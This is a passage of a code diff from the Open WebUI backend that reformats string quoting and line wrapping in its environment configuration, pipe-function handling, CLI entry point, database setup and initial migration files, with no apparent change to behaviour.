path, like: /app/audit.log -AUDIT_LOGS_FILE_PATH = os.getenv("AUDIT_LOGS_FILE_PATH", f"{DATA_DIR}/audit.log") +AUDIT_LOGS_FILE_PATH = os.getenv('AUDIT_LOGS_FILE_PATH', f'{DATA_DIR}/audit.log') # Maximum size of a file before rotating into a new log file -AUDIT_LOG_FILE_ROTATION_SIZE = os.getenv("AUDIT_LOG_FILE_ROTATION_SIZE", "10MB") +AUDIT_LOG_FILE_ROTATION_SIZE = os.getenv('AUDIT_LOG_FILE_ROTATION_SIZE', '10MB') # Comma separated list of logger names to use for audit logging # Default is "uvicorn.access" which is the access log for Uvicorn # You can add more logger names to this list if you want to capture more logs -AUDIT_UVICORN_LOGGER_NAMES = os.getenv( - "AUDIT_UVICORN_LOGGER_NAMES", "uvicorn.access" -).split(",") +AUDIT_UVICORN_LOGGER_NAMES = os.getenv('AUDIT_UVICORN_LOGGER_NAMES', 'uvicorn.access').split(',') # METADATA | REQUEST | REQUEST_RESPONSE -AUDIT_LOG_LEVEL = os.getenv("AUDIT_LOG_LEVEL", "NONE").upper() +AUDIT_LOG_LEVEL = os.getenv('AUDIT_LOG_LEVEL', 'NONE').upper() try: - MAX_BODY_LOG_SIZE = int(os.environ.get("MAX_BODY_LOG_SIZE") or 2048) + MAX_BODY_LOG_SIZE = int(os.environ.get('MAX_BODY_LOG_SIZE') or 2048) except ValueError: MAX_BODY_LOG_SIZE = 2048 # Comma separated list for urls to exclude from audit -AUDIT_EXCLUDED_PATHS = os.getenv("AUDIT_EXCLUDED_PATHS", "/chats,/chat,/folders").split( - "," -) +AUDIT_EXCLUDED_PATHS = os.getenv('AUDIT_EXCLUDED_PATHS', '/chats,/chat,/folders').split(',') AUDIT_EXCLUDED_PATHS = [path.strip() for path in AUDIT_EXCLUDED_PATHS] -AUDIT_EXCLUDED_PATHS = [path.lstrip("/") for path in AUDIT_EXCLUDED_PATHS] +AUDIT_EXCLUDED_PATHS = [path.lstrip('/') for path in AUDIT_EXCLUDED_PATHS] # Comma separated list of urls to include in audit (whitelist mode) # When set, only these paths are audited and AUDIT_EXCLUDED_PATHS is ignored -AUDIT_INCLUDED_PATHS = os.getenv("AUDIT_INCLUDED_PATHS", "").split(",") +AUDIT_INCLUDED_PATHS = os.getenv('AUDIT_INCLUDED_PATHS', '').split(',') AUDIT_INCLUDED_PATHS = [path.strip() for path in AUDIT_INCLUDED_PATHS] -AUDIT_INCLUDED_PATHS = [path.lstrip("/") for path in AUDIT_INCLUDED_PATHS if path] +AUDIT_INCLUDED_PATHS = [path.lstrip('/') for path in AUDIT_INCLUDED_PATHS if path] #################################### # OPENTELEMETRY #################################### -ENABLE_OTEL = os.environ.get("ENABLE_OTEL", "False").lower() == "true" -ENABLE_OTEL_TRACES = os.environ.get("ENABLE_OTEL_TRACES", "False").lower() == "true" -ENABLE_OTEL_METRICS = os.environ.get("ENABLE_OTEL_METRICS", "False").lower() == "true" -ENABLE_OTEL_LOGS = os.environ.get("ENABLE_OTEL_LOGS", "False").lower() == "true" +ENABLE_OTEL = os.environ.get('ENABLE_OTEL', 'False').lower() == 'true' +ENABLE_OTEL_TRACES = os.environ.get('ENABLE_OTEL_TRACES', 'False').lower() == 'true' +ENABLE_OTEL_METRICS = os.environ.get('ENABLE_OTEL_METRICS', 'False').lower() == 'true' +ENABLE_OTEL_LOGS = os.environ.get('ENABLE_OTEL_LOGS', 'False').lower() == 'true' -OTEL_EXPORTER_OTLP_ENDPOINT = os.environ.get( - "OTEL_EXPORTER_OTLP_ENDPOINT", "http://localhost:4317" -) -OTEL_METRICS_EXPORTER_OTLP_ENDPOINT = os.environ.get( - "OTEL_METRICS_EXPORTER_OTLP_ENDPOINT", OTEL_EXPORTER_OTLP_ENDPOINT -) -OTEL_LOGS_EXPORTER_OTLP_ENDPOINT = os.environ.get( - "OTEL_LOGS_EXPORTER_OTLP_ENDPOINT", OTEL_EXPORTER_OTLP_ENDPOINT -) -OTEL_EXPORTER_OTLP_INSECURE = ( - os.environ.get("OTEL_EXPORTER_OTLP_INSECURE", "False").lower() == "true" -) +OTEL_EXPORTER_OTLP_ENDPOINT = os.environ.get('OTEL_EXPORTER_OTLP_ENDPOINT', 'http://localhost:4317') +OTEL_METRICS_EXPORTER_OTLP_ENDPOINT = os.environ.get('OTEL_METRICS_EXPORTER_OTLP_ENDPOINT', OTEL_EXPORTER_OTLP_ENDPOINT) +OTEL_LOGS_EXPORTER_OTLP_ENDPOINT = os.environ.get('OTEL_LOGS_EXPORTER_OTLP_ENDPOINT', OTEL_EXPORTER_OTLP_ENDPOINT) +OTEL_EXPORTER_OTLP_INSECURE = os.environ.get('OTEL_EXPORTER_OTLP_INSECURE', 'False').lower() == 'true' OTEL_METRICS_EXPORTER_OTLP_INSECURE = ( - os.environ.get( - "OTEL_METRICS_EXPORTER_OTLP_INSECURE", str(OTEL_EXPORTER_OTLP_INSECURE) - ).lower() - == "true" + os.environ.get('OTEL_METRICS_EXPORTER_OTLP_INSECURE', str(OTEL_EXPORTER_OTLP_INSECURE)).lower() == 'true' ) OTEL_LOGS_EXPORTER_OTLP_INSECURE = ( - os.environ.get( - "OTEL_LOGS_EXPORTER_OTLP_INSECURE", str(OTEL_EXPORTER_OTLP_INSECURE) - ).lower() - == "true" -) -OTEL_SERVICE_NAME = os.environ.get("OTEL_SERVICE_NAME", "open-webui") -OTEL_RESOURCE_ATTRIBUTES = os.environ.get( - "OTEL_RESOURCE_ATTRIBUTES", "" -) # e.g. key1=val1,key2=val2 -OTEL_TRACES_SAMPLER = os.environ.get( - "OTEL_TRACES_SAMPLER", "parentbased_always_on" -).lower() -OTEL_BASIC_AUTH_USERNAME = os.environ.get("OTEL_BASIC_AUTH_USERNAME", "") -OTEL_BASIC_AUTH_PASSWORD = os.environ.get("OTEL_BASIC_AUTH_PASSWORD", "") -OTEL_METRICS_EXPORT_INTERVAL_MILLIS = int( - os.environ.get("OTEL_METRICS_EXPORT_INTERVAL_MILLIS", "10000") + os.environ.get('OTEL_LOGS_EXPORTER_OTLP_INSECURE', str(OTEL_EXPORTER_OTLP_INSECURE)).lower() == 'true' ) +OTEL_SERVICE_NAME = os.environ.get('OTEL_SERVICE_NAME', 'open-webui') +OTEL_RESOURCE_ATTRIBUTES = os.environ.get('OTEL_RESOURCE_ATTRIBUTES', '') # e.g. key1=val1,key2=val2 +OTEL_TRACES_SAMPLER = os.environ.get('OTEL_TRACES_SAMPLER', 'parentbased_always_on').lower() +OTEL_BASIC_AUTH_USERNAME = os.environ.get('OTEL_BASIC_AUTH_USERNAME', '') +OTEL_BASIC_AUTH_PASSWORD = os.environ.get('OTEL_BASIC_AUTH_PASSWORD', '') +OTEL_METRICS_EXPORT_INTERVAL_MILLIS = int(os.environ.get('OTEL_METRICS_EXPORT_INTERVAL_MILLIS', '10000')) -OTEL_METRICS_BASIC_AUTH_USERNAME = os.environ.get( - "OTEL_METRICS_BASIC_AUTH_USERNAME", OTEL_BASIC_AUTH_USERNAME -) -OTEL_METRICS_BASIC_AUTH_PASSWORD = os.environ.get( - "OTEL_METRICS_BASIC_AUTH_PASSWORD", OTEL_BASIC_AUTH_PASSWORD -) -OTEL_LOGS_BASIC_AUTH_USERNAME = os.environ.get( - "OTEL_LOGS_BASIC_AUTH_USERNAME", OTEL_BASIC_AUTH_USERNAME -) -OTEL_LOGS_BASIC_AUTH_PASSWORD = os.environ.get( - "OTEL_LOGS_BASIC_AUTH_PASSWORD", OTEL_BASIC_AUTH_PASSWORD -) +OTEL_METRICS_BASIC_AUTH_USERNAME = os.environ.get('OTEL_METRICS_BASIC_AUTH_USERNAME', OTEL_BASIC_AUTH_USERNAME) +OTEL_METRICS_BASIC_AUTH_PASSWORD = os.environ.get('OTEL_METRICS_BASIC_AUTH_PASSWORD', OTEL_BASIC_AUTH_PASSWORD) +OTEL_LOGS_BASIC_AUTH_USERNAME = os.environ.get('OTEL_LOGS_BASIC_AUTH_USERNAME', OTEL_BASIC_AUTH_USERNAME) +OTEL_LOGS_BASIC_AUTH_PASSWORD = os.environ.get('OTEL_LOGS_BASIC_AUTH_PASSWORD', OTEL_BASIC_AUTH_PASSWORD) -OTEL_OTLP_SPAN_EXPORTER = os.environ.get( - "OTEL_OTLP_SPAN_EXPORTER", "grpc" -).lower() # grpc or http +OTEL_OTLP_SPAN_EXPORTER = os.environ.get('OTEL_OTLP_SPAN_EXPORTER', 'grpc').lower() # grpc or http OTEL_METRICS_OTLP_SPAN_EXPORTER = os.environ.get( - "OTEL_METRICS_OTLP_SPAN_EXPORTER", OTEL_OTLP_SPAN_EXPORTER + 'OTEL_METRICS_OTLP_SPAN_EXPORTER', OTEL_OTLP_SPAN_EXPORTER ).lower() # grpc or http OTEL_LOGS_OTLP_SPAN_EXPORTER = os.environ.get( - "OTEL_LOGS_OTLP_SPAN_EXPORTER", OTEL_OTLP_SPAN_EXPORTER + 'OTEL_LOGS_OTLP_SPAN_EXPORTER', OTEL_OTLP_SPAN_EXPORTER ).lower() # grpc or http #################################### # TOOLS/FUNCTIONS PIP OPTIONS #################################### ENABLE_PIP_INSTALL_FRONTMATTER_REQUIREMENTS = ( - os.environ.get("ENABLE_PIP_INSTALL_FRONTMATTER_REQUIREMENTS", "True").lower() - == "true" + os.environ.get('ENABLE_PIP_INSTALL_FRONTMATTER_REQUIREMENTS', 'True').lower() == 'true' ) -PIP_OPTIONS = os.getenv("PIP_OPTIONS", "").split() -PIP_PACKAGE_INDEX_OPTIONS = os.getenv("PIP_PACKAGE_INDEX_OPTIONS", "").split() +PIP_OPTIONS = os.getenv('PIP_OPTIONS', '').split() +PIP_PACKAGE_INDEX_OPTIONS = os.getenv('PIP_PACKAGE_INDEX_OPTIONS', '').split() #################################### # PROGRESSIVE WEB APP OPTIONS #################################### -EXTERNAL_PWA_MANIFEST_URL = os.environ.get("EXTERNAL_PWA_MANIFEST_URL") +EXTERNAL_PWA_MANIFEST_URL = os.environ.get('EXTERNAL_PWA_MANIFEST_URL') #################################### # GROUP DEFAULTS #################################### # Controls the default "Who can share to this group" setting for new groups. # Env var values: "true" (anyone), "false" (no one), "members" (only group members). -_default_group_share = ( - os.environ.get("DEFAULT_GROUP_SHARE_PERMISSION", "members").strip().lower() -) -DEFAULT_GROUP_SHARE_PERMISSION = ( - "members" if _default_group_share == "members" else _default_group_share == "true" -) +_default_group_share = os.environ.get('DEFAULT_GROUP_SHARE_PERMISSION', 'members').strip().lower() +DEFAULT_GROUP_SHARE_PERMISSION = 'members' if _default_group_share == 'members' else _default_group_share == 'true'
backend/open_webui/functions.py+85 −95 modified@@ -57,17 +57,15 @@ def get_function_module_by_id(request: Request, pipe_id: str): function_module, _, _ = get_function_module_from_cache(request, pipe_id) - if hasattr(function_module, "valves") and hasattr(function_module, "Valves"): + if hasattr(function_module, 'valves') and hasattr(function_module, 'Valves'): Valves = function_module.Valves valves = Functions.get_function_valves_by_id(pipe_id) if valves: try: - function_module.valves = Valves( - **{k: v for k, v in valves.items() if v is not None} - ) + function_module.valves = Valves(**{k: v for k, v in valves.items() if v is not None}) except Exception as e: - log.exception(f"Error loading valves for function {pipe_id}: {e}") + log.exception(f'Error loading valves for function {pipe_id}: {e}') raise e else: function_module.valves = Valves() @@ -76,19 +74,19 @@ def get_function_module_by_id(request: Request, pipe_id: str): async def get_function_models(request): - pipes = Functions.get_functions_by_type("pipe", active_only=True) + pipes = Functions.get_functions_by_type('pipe', active_only=True) pipe_models = [] for pipe in pipes: try: function_module = get_function_module_by_id(request, pipe.id) has_user_valves = False - if hasattr(function_module, "UserValves"): + if hasattr(function_module, 'UserValves'): has_user_valves = True # Check if function is a manifold - if hasattr(function_module, "pipes"): + if hasattr(function_module, 'pipes'): sub_pipes = [] # Handle pipes being a list, sync function, or async function @@ -104,46 +102,44 @@ async def get_function_models(request): log.exception(e) sub_pipes = [] - log.debug( - f"get_function_models: function '{pipe.id}' is a manifold of {sub_pipes}" - ) + log.debug(f"get_function_models: function '{pipe.id}' is a manifold of {sub_pipes}") for p in sub_pipes: sub_pipe_id = f'{pipe.id}.{p["id"]}' - sub_pipe_name = p["name"] + sub_pipe_name = p['name'] - if hasattr(function_module, "name"): - sub_pipe_name = f"{function_module.name}{sub_pipe_name}" + if hasattr(function_module, 'name'): + sub_pipe_name = f'{function_module.name}{sub_pipe_name}' - pipe_flag = {"type": pipe.type} + pipe_flag = {'type': pipe.type} pipe_models.append( { - "id": sub_pipe_id, - "name": sub_pipe_name, - "object": "model", - "created": pipe.created_at, - "owned_by": "openai", - "pipe": pipe_flag, - "has_user_valves": has_user_valves, + 'id': sub_pipe_id, + 'name': sub_pipe_name, + 'object': 'model', + 'created': pipe.created_at, + 'owned_by': 'openai', + 'pipe': pipe_flag, + 'has_user_valves': has_user_valves, } ) else: - pipe_flag = {"type": "pipe"} + pipe_flag = {'type': 'pipe'} log.debug( f"get_function_models: function '{pipe.id}' is a single pipe {{ 'id': {pipe.id}, 'name': {pipe.name} }}" ) pipe_models.append( { - "id": pipe.id, - "name": pipe.name, - "object": "model", - "created": pipe.created_at, - "owned_by": "openai", - "pipe": pipe_flag, - "has_user_valves": has_user_valves, + 'id': pipe.id, + 'name': pipe.name, + 'object': 'model', + 'created': pipe.created_at, + 'owned_by': 'openai', + 'pipe': pipe_flag, + 'has_user_valves': has_user_valves, } ) except Exception as e: @@ -153,9 +149,7 @@ async def get_function_models(request): return pipe_models -async def generate_function_chat_completion( - request, form_data, user, models: dict = {} -): +async def generate_function_chat_completion(request, form_data, user, models: dict = {}): async def execute_pipe(pipe, params): if inspect.iscoroutinefunction(pipe): return await pipe(**params) @@ -166,32 +160,32 @@ async def get_message_content(res: str | Generator | AsyncGenerator) -> str: if isinstance(res, str): return res if isinstance(res, Generator): - return "".join(map(str, res)) + return ''.join(map(str, res)) if isinstance(res, AsyncGenerator): - return "".join([str(stream) async for stream in res]) + return ''.join([str(stream) async for stream in res]) def process_line(form_data: dict, line): if isinstance(line, BaseModel): line = line.model_dump_json() - line = f"data: {line}" + line = f'data: {line}' if isinstance(line, dict): - line = f"data: {json.dumps(line)}" + line = f'data: {json.dumps(line)}' try: - line = line.decode("utf-8") + line = line.decode('utf-8') except Exception: pass - if line.startswith("data:"): - return f"{line}\n\n" + if line.startswith('data:'): + return f'{line}\n\n' else: - line = openai_chat_chunk_message_template(form_data["model"], line) - return f"data: {json.dumps(line)}\n\n" + line = openai_chat_chunk_message_template(form_data['model'], line) + return f'data: {json.dumps(line)}\n\n' def get_pipe_id(form_data: dict) -> str: - pipe_id = form_data["model"] - if "." in pipe_id: - pipe_id, _ = pipe_id.split(".", 1) + pipe_id = form_data['model'] + if '.' in pipe_id: + pipe_id, _ = pipe_id.split('.', 1) return pipe_id def get_function_params(function_module, form_data, user, extra_params=None): @@ -202,27 +196,25 @@ def get_function_params(function_module, form_data, user, extra_params=None): # Get the signature of the function sig = inspect.signature(function_module.pipe) - params = {"body": form_data} | { - k: v for k, v in extra_params.items() if k in sig.parameters - } + params = {'body': form_data} | {k: v for k, v in extra_params.items() if k in sig.parameters} - if "__user__" in params and hasattr(function_module, "UserValves"): + if '__user__' in params and hasattr(function_module, 'UserValves'): user_valves = Functions.get_user_valves_by_id_and_user_id(pipe_id, user.id) try: - params["__user__"]["valves"] = function_module.UserValves(**user_valves) + params['__user__']['valves'] = function_module.UserValves(**user_valves) except Exception as e: log.exception(e) - params["__user__"]["valves"] = function_module.UserValves() + params['__user__']['valves'] = function_module.UserValves() return params - model_id = form_data.get("model") + model_id = form_data.get('model') model_info = Models.get_model_by_id(model_id) - metadata = form_data.pop("metadata", {}) + metadata = form_data.pop('metadata', {}) - files = metadata.get("files", []) - tool_ids = metadata.get("tool_ids", []) + files = metadata.get('files', []) + tool_ids = metadata.get('tool_ids', []) # Check if tool_ids is None if tool_ids is None: tool_ids = [] @@ -233,56 +225,56 @@ def get_function_params(function_module, form_data, user, extra_params=None): __task_body__ = None if metadata: - if all(k in metadata for k in ("session_id", "chat_id", "message_id")): + if all(k in metadata for k in ('session_id', 'chat_id', 'message_id')): __event_emitter__ = get_event_emitter(metadata) __event_call__ = get_event_call(metadata) - __task__ = metadata.get("task", None) - __task_body__ = metadata.get("task_body", None) + __task__ = metadata.get('task', None) + __task_body__ = metadata.get('task_body', None) oauth_token = None try: - if request.cookies.get("oauth_session_id", None): + if request.cookies.get('oauth_session_id', None): oauth_token = await request.app.state.oauth_manager.get_oauth_token( user.id, - request.cookies.get("oauth_session_id", None), + request.cookies.get('oauth_session_id', None), ) except Exception as e: - log.error(f"Error getting OAuth token: {e}") + log.error(f'Error getting OAuth token: {e}') extra_params = { - "__event_emitter__": __event_emitter__, - "__event_call__": __event_call__, - "__chat_id__": metadata.get("chat_id", None), - "__session_id__": metadata.get("session_id", None), - "__message_id__": metadata.get("message_id", None), - "__task__": __task__, - "__task_body__": __task_body__, - "__files__": files, - "__user__": user.model_dump() if isinstance(user, UserModel) else {}, - "__metadata__": metadata, - "__oauth_token__": oauth_token, - "__request__": request, + '__event_emitter__': __event_emitter__, + '__event_call__': __event_call__, + '__chat_id__': metadata.get('chat_id', None), + '__session_id__': metadata.get('session_id', None), + '__message_id__': metadata.get('message_id', None), + '__task__': __task__, + '__task_body__': __task_body__, + '__files__': files, + '__user__': user.model_dump() if isinstance(user, UserModel) else {}, + '__metadata__': metadata, + '__oauth_token__': oauth_token, + '__request__': request, } - extra_params["__tools__"] = await get_tools( + extra_params['__tools__'] = await get_tools( request, tool_ids, user, { **extra_params, - "__model__": models.get(form_data["model"], None), - "__messages__": form_data["messages"], - "__files__": files, + '__model__': models.get(form_data['model'], None), + '__messages__': form_data['messages'], + '__files__': files, }, ) if model_info: if model_info.base_model_id: - form_data["model"] = model_info.base_model_id + form_data['model'] = model_info.base_model_id params = model_info.params.model_dump() if params: - system = params.pop("system", None) + system = params.pop('system', None) form_data = apply_model_params_to_body_openai(params, form_data) form_data = apply_system_prompt_to_body(system, form_data, metadata, user) @@ -292,7 +284,7 @@ def get_function_params(function_module, form_data, user, extra_params=None): pipe = function_module.pipe params = get_function_params(function_module, form_data, user, extra_params) - if form_data.get("stream", False): + if form_data.get('stream', False): async def stream_content(): try: @@ -304,17 +296,17 @@ async def stream_content(): yield data return if isinstance(res, dict): - yield f"data: {json.dumps(res)}\n\n" + yield f'data: {json.dumps(res)}\n\n' return except Exception as e: - log.error(f"Error: {e}") - yield f"data: {json.dumps({'error': {'detail':str(e)}})}\n\n" + log.error(f'Error: {e}') + yield f'data: {json.dumps({"error": {"detail": str(e)}})}\n\n' return if isinstance(res, str): - message = openai_chat_chunk_message_template(form_data["model"], res) - yield f"data: {json.dumps(message)}\n\n" + message = openai_chat_chunk_message_template(form_data['model'], res) + yield f'data: {json.dumps(message)}\n\n' if isinstance(res, Iterator): for line in res: @@ -325,26 +317,24 @@ async def stream_content(): yield process_line(form_data, line) if isinstance(res, str) or isinstance(res, Generator): - finish_message = openai_chat_chunk_message_template( - form_data["model"], "" - ) - finish_message["choices"][0]["finish_reason"] = "stop" - yield f"data: {json.dumps(finish_message)}\n\n" - yield "data: [DONE]" + finish_message = openai_chat_chunk_message_template(form_data['model'], '') + finish_message['choices'][0]['finish_reason'] = 'stop' + yield f'data: {json.dumps(finish_message)}\n\n' + yield 'data: [DONE]' - return StreamingResponse(stream_content(), media_type="text/event-stream") + return StreamingResponse(stream_content(), media_type='text/event-stream') else: try: res = await execute_pipe(pipe, params) except Exception as e: - log.error(f"Error: {e}") - return {"error": {"detail": str(e)}} + log.error(f'Error: {e}') + return {'error': {'detail': str(e)}} if isinstance(res, StreamingResponse) or isinstance(res, dict): return res if isinstance(res, BaseModel): return res.model_dump() message = await get_message_content(res) - return openai_chat_completion_message_template(form_data["model"], message) + return openai_chat_completion_message_template(form_data['model'], message)
backend/open_webui/__init__.py+29 −35 modified@@ -10,94 +10,88 @@ app = typer.Typer() -KEY_FILE = Path.cwd() / ".webui_secret_key" +KEY_FILE = Path.cwd() / '.webui_secret_key' def version_callback(value: bool): if value: from open_webui.env import VERSION - typer.echo(f"Open WebUI version: {VERSION}") + typer.echo(f'Open WebUI version: {VERSION}') raise typer.Exit() @app.command() def main( - version: Annotated[ - Optional[bool], typer.Option("--version", callback=version_callback) - ] = None, + version: Annotated[Optional[bool], typer.Option('--version', callback=version_callback)] = None, ): pass @app.command() def serve( - host: str = "0.0.0.0", + host: str = '0.0.0.0', port: int = 8080, ): - os.environ["FROM_INIT_PY"] = "true" - if os.getenv("WEBUI_SECRET_KEY") is None: - typer.echo( - "Loading WEBUI_SECRET_KEY from file, not provided as an environment variable." - ) + os.environ['FROM_INIT_PY'] = 'true' + if os.getenv('WEBUI_SECRET_KEY') is None: + typer.echo('Loading WEBUI_SECRET_KEY from file, not provided as an environment variable.') if not KEY_FILE.exists(): - typer.echo(f"Generating a new secret key and saving it to {KEY_FILE}") + typer.echo(f'Generating a new secret key and saving it to {KEY_FILE}') KEY_FILE.write_bytes(base64.b64encode(random.randbytes(12))) - typer.echo(f"Loading WEBUI_SECRET_KEY from {KEY_FILE}") - os.environ["WEBUI_SECRET_KEY"] = KEY_FILE.read_text() + typer.echo(f'Loading WEBUI_SECRET_KEY from {KEY_FILE}') + os.environ['WEBUI_SECRET_KEY'] = KEY_FILE.read_text() - if os.getenv("USE_CUDA_DOCKER", "false") == "true": - typer.echo( - "CUDA is enabled, appending LD_LIBRARY_PATH to include torch/cudnn & cublas libraries." - ) - LD_LIBRARY_PATH = os.getenv("LD_LIBRARY_PATH", "").split(":") - os.environ["LD_LIBRARY_PATH"] = ":".join( + if os.getenv('USE_CUDA_DOCKER', 'false') == 'true': + typer.echo('CUDA is enabled, appending LD_LIBRARY_PATH to include torch/cudnn & cublas libraries.') + LD_LIBRARY_PATH = os.getenv('LD_LIBRARY_PATH', '').split(':') + os.environ['LD_LIBRARY_PATH'] = ':'.join( LD_LIBRARY_PATH + [ - "/usr/local/lib/python3.11/site-packages/torch/lib", - "/usr/local/lib/python3.11/site-packages/nvidia/cudnn/lib", + '/usr/local/lib/python3.11/site-packages/torch/lib', + '/usr/local/lib/python3.11/site-packages/nvidia/cudnn/lib', ] ) try: import torch - assert torch.cuda.is_available(), "CUDA not available" - typer.echo("CUDA seems to be working") + assert torch.cuda.is_available(), 'CUDA not available' + typer.echo('CUDA seems to be working') except Exception as e: typer.echo( - "Error when testing CUDA but USE_CUDA_DOCKER is true. " - "Resetting USE_CUDA_DOCKER to false and removing " - f"LD_LIBRARY_PATH modifications: {e}" + 'Error when testing CUDA but USE_CUDA_DOCKER is true. ' + 'Resetting USE_CUDA_DOCKER to false and removing ' + f'LD_LIBRARY_PATH modifications: {e}' ) - os.environ["USE_CUDA_DOCKER"] = "false" - os.environ["LD_LIBRARY_PATH"] = ":".join(LD_LIBRARY_PATH) + os.environ['USE_CUDA_DOCKER'] = 'false' + os.environ['LD_LIBRARY_PATH'] = ':'.join(LD_LIBRARY_PATH) import open_webui.main # we need set environment variables before importing main from open_webui.env import UVICORN_WORKERS # Import the workers setting uvicorn.run( - "open_webui.main:app", + 'open_webui.main:app', host=host, port=port, - forwarded_allow_ips="*", + forwarded_allow_ips='*', workers=UVICORN_WORKERS, ) @app.command() def dev( - host: str = "0.0.0.0", + host: str = '0.0.0.0', port: int = 8080, reload: bool = True, ): uvicorn.run( - "open_webui.main:app", + 'open_webui.main:app', host=host, port=port, reload=reload, - forwarded_allow_ips="*", + forwarded_allow_ips='*', ) -if __name__ == "__main__": +if __name__ == '__main__': app()
backend/open_webui/internal/db.py+20 −30 modified@@ -56,25 +56,23 @@ def handle_peewee_migration(DATABASE_URL): # db = None try: # Replace the postgresql:// with postgres:// to handle the peewee migration - db = register_connection(DATABASE_URL.replace("postgresql://", "postgres://")) - migrate_dir = OPEN_WEBUI_DIR / "internal" / "migrations" + db = register_connection(DATABASE_URL.replace('postgresql://', 'postgres://')) + migrate_dir = OPEN_WEBUI_DIR / 'internal' / 'migrations' router = Router(db, logger=log, migrate_dir=migrate_dir) router.run() db.close() except Exception as e: - log.error(f"Failed to initialize the database connection: {e}") - log.warning( - "Hint: If your database password contains special characters, you may need to URL-encode it." - ) + log.error(f'Failed to initialize the database connection: {e}') + log.warning('Hint: If your database password contains special characters, you may need to URL-encode it.') raise finally: # Properly closing the database connection if db and not db.is_closed(): db.close() # Assert if db connection has been closed - assert db.is_closed(), "Database connection is still open." + assert db.is_closed(), 'Database connection is still open.' if ENABLE_DB_MIGRATIONS: @@ -84,15 +82,13 @@ def handle_peewee_migration(DATABASE_URL): SQLALCHEMY_DATABASE_URL = DATABASE_URL # Handle SQLCipher URLs -if SQLALCHEMY_DATABASE_URL.startswith("sqlite+sqlcipher://"): - database_password = os.environ.get("DATABASE_PASSWORD") - if not database_password or database_password.strip() == "": - raise ValueError( - "DATABASE_PASSWORD is required when using sqlite+sqlcipher:// URLs" - ) +if SQLALCHEMY_DATABASE_URL.startswith('sqlite+sqlcipher://'): + database_password = os.environ.get('DATABASE_PASSWORD') + if not database_password or database_password.strip() == '': + raise ValueError('DATABASE_PASSWORD is required when using sqlite+sqlcipher:// URLs') # Extract database path from SQLCipher URL - db_path = SQLALCHEMY_DATABASE_URL.replace("sqlite+sqlcipher://", "") + db_path = SQLALCHEMY_DATABASE_URL.replace('sqlite+sqlcipher://', '') # Create a custom creator function that uses sqlcipher3 def create_sqlcipher_connection(): @@ -109,7 +105,7 @@ def create_sqlcipher_connection(): # or QueuePool if DATABASE_POOL_SIZE is explicitly configured. if isinstance(DATABASE_POOL_SIZE, int) and DATABASE_POOL_SIZE > 0: engine = create_engine( - "sqlite://", + 'sqlite://', creator=create_sqlcipher_connection, pool_size=DATABASE_POOL_SIZE, max_overflow=DATABASE_POOL_MAX_OVERFLOW, @@ -121,28 +117,26 @@ def create_sqlcipher_connection(): ) else: engine = create_engine( - "sqlite://", + 'sqlite://', creator=create_sqlcipher_connection, poolclass=NullPool, echo=False, ) - log.info("Connected to encrypted SQLite database using SQLCipher") + log.info('Connected to encrypted SQLite database using SQLCipher') -elif "sqlite" in SQLALCHEMY_DATABASE_URL: - engine = create_engine( - SQLALCHEMY_DATABASE_URL, connect_args={"check_same_thread": False} - ) +elif 'sqlite' in SQLALCHEMY_DATABASE_URL: + engine = create_engine(SQLALCHEMY_DATABASE_URL, connect_args={'check_same_thread': False}) def on_connect(dbapi_connection, connection_record): cursor = dbapi_connection.cursor() if DATABASE_ENABLE_SQLITE_WAL: - cursor.execute("PRAGMA journal_mode=WAL") + cursor.execute('PRAGMA journal_mode=WAL') else: - cursor.execute("PRAGMA journal_mode=DELETE") + cursor.execute('PRAGMA journal_mode=DELETE') cursor.close() - event.listen(engine, "connect", on_connect) + event.listen(engine, 'connect', on_connect) else: if isinstance(DATABASE_POOL_SIZE, int): if DATABASE_POOL_SIZE > 0: @@ -156,16 +150,12 @@ def on_connect(dbapi_connection, connection_record): poolclass=QueuePool, ) else: - engine = create_engine( - SQLALCHEMY_DATABASE_URL, pool_pre_ping=True, poolclass=NullPool - ) + engine = create_engine(SQLALCHEMY_DATABASE_URL, pool_pre_ping=True, poolclass=NullPool) else: engine = create_engine(SQLALCHEMY_DATABASE_URL, pool_pre_ping=True) -SessionLocal = sessionmaker( - autocommit=False, autoflush=False, bind=engine, expire_on_commit=False -) +SessionLocal = sessionmaker(autocommit=False, autoflush=False, bind=engine, expire_on_commit=False) metadata_obj = MetaData(schema=DATABASE_SCHEMA) Base = declarative_base(metadata=metadata_obj) ScopedSession = scoped_session(SessionLocal)
backend/open_webui/internal/migrations/001_initial_schema.py+24 −24 modified@@ -56,7 +56,7 @@ class Auth(pw.Model): active = pw.BooleanField() class Meta: - table_name = "auth" + table_name = 'auth' @migrator.create_model class Chat(pw.Model): @@ -67,7 +67,7 @@ class Chat(pw.Model): timestamp = pw.BigIntegerField() class Meta: - table_name = "chat" + table_name = 'chat' @migrator.create_model class ChatIdTag(pw.Model): @@ -78,7 +78,7 @@ class ChatIdTag(pw.Model): timestamp = pw.BigIntegerField() class Meta: - table_name = "chatidtag" + table_name = 'chatidtag' @migrator.create_model class Document(pw.Model): @@ -92,7 +92,7 @@ class Document(pw.Model): timestamp = pw.BigIntegerField() class Meta: - table_name = "document" + table_name = 'document' @migrator.create_model class Modelfile(pw.Model): @@ -103,7 +103,7 @@ class Modelfile(pw.Model): timestamp = pw.BigIntegerField() class Meta: - table_name = "modelfile" + table_name = 'modelfile' @migrator.create_model class Prompt(pw.Model): @@ -115,7 +115,7 @@ class Prompt(pw.Model): timestamp = pw.BigIntegerField() class Meta: - table_name = "prompt" + table_name = 'prompt' @migrator.create_model class Tag(pw.Model): @@ -125,7 +125,7 @@ class Tag(pw.Model): data = pw.TextField(null=True) class Meta: - table_name = "tag" + table_name = 'tag' @migrator.create_model class User(pw.Model): @@ -137,7 +137,7 @@ class User(pw.Model): timestamp = pw.BigIntegerField() class Meta: - table_name = "user" + table_name = 'user' def migrate_external(migrator: Migrator, database: pw.Database, *, fake=False): @@ -149,7 +149,7 @@ class Auth(pw.Model): active = pw.BooleanField() class Meta: - table_name = "auth" + table_name = 'auth' @migrator.create_model class Chat(pw.Model): @@ -160,7 +160,7 @@ class Chat(pw.Model): timestamp = pw.BigIntegerField() class Meta: - table_name = "chat" + table_name = 'chat' @migrator.create_model class ChatIdTag(pw.Model): @@ -171,7 +171,7 @@ class ChatIdTag(pw.Model): timestamp = pw.BigIntegerField() class Meta: - table_name = "chatidtag" + table_name = 'chatidtag' @migrator.create_model class Document(pw.Model): @@ -185,7 +185,7 @@ class Document(pw.Model): timestamp = pw.BigIntegerField() class Meta: - table_name = "document" + table_name = 'document' @migrator.create_model class Modelfile(pw.Model): @@ -196,7 +196,7 @@ class Modelfile(pw.Model): 